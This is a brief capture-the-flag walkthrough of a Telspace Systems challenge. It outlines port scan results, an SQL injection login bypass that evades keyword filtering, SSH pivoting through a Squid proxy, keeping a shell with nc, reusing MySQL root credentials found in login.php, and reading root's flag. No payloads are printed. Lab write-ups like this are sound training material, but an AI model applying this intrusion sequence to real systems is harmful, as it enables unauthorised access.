This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town).
Scanning with aggressive all ports gave us
PORT STATE SERVICE VERSIONQuite simple. The default web page looks
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
Good. I tried log in using default credentials, but without success. So, I examined SQL Injection and I have got SQL Syntax Error, because OR and "=" part are filtered. So, let's try bypass the filtering.
I found very useful list of bypassing filtering
I have used the first from the list and I have got
Excellent! But we have a little problem - SSH is filtering... We know that the target serves also HTTP Proxy. Maybe we can connect to SSH through http-proxy. I configured a ProxyChain and
We are not logged in... Hmm, but we know that we can execute command over SSH, let's examine our idea
Excellent! Let's try use nc to maintain session
Yeah! We have got limited shell! I found in the /var/www/ directory login.php file which contains credentials for mysql (root:root).
Excellent! Let's log in as sara and verify what we can do as root
Amazing! We can cat the flag.txt from root directory!
and...
Game over!
